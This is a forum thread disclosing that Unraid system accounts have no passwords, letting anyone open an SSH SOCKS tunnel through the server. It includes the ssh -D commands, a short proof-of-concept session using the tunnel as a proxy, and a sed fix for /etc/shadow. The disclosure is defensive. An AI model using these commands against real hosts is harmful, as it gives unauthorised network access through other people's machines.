No passwords for system users - unraid can be used as a rogue ssh tunnel


8 posts in this topic Last Reply

Recommended Posts

Hello guys,


I couldn't find any proper channels for announcing vulnerabilities, so i think this might be the best way to catch your attention. Apologies if there are proper channels, I did not have enough time to search for them.


Upon looking at some logs I noticed:

```sshd[28121]: Accepted none for lp from port 26028 ssh2```


Then after i took a close look at /etc/shadow I noticed almost all users don't have passwords.

While they can't actually execute commands on the system, they can see information about the system:


$ ssh unraid -l news
Linux 4.19.107-Unraid.
Could not chdir to home directory /usr/lib/news: No such file or directory
Connection to unraid closed.




But most troublesome, and maybe you guys are not aware of this, but in order to open an ssh tunnel you don't need an actual shell.



$ ssh -D 3129 -f -C -q -N lp@unraid
$ netstat -plan | grep 3129
tcp        0      0*               LISTEN      1658854/ssh   


Voila! then you have an ssh tunnel opened.

For now I patched my box, but of course it won't survive the reboot.


An easy fix would be:

`sed -i -e 's/::1/:!!:1/g' /etc/shadow`





Link to post

Btw, here's a PoC in bash (anonymized the IPs a bit, hope you don't mind :P )


[root@taicasimaica ~]# curl -ks4
[root@taicasimaica ~]# ssh -D 3129 -f -C -q -N -p 7127
The authenticity of host '[]:7127 ([]:7127)' can't be established.
ECDSA key fingerprint is SHA256:/Kg3rfHXB/0XIa2nW5UHOLAiipUztnhNDvxAyz91CP8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
[root@taicasimaica ~]# export http_proxy=socks5://
[root@taicasimaica ~]# curl -ks4
[root@taicasimaica ~]#


Link to post
  • 3 weeks later...

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.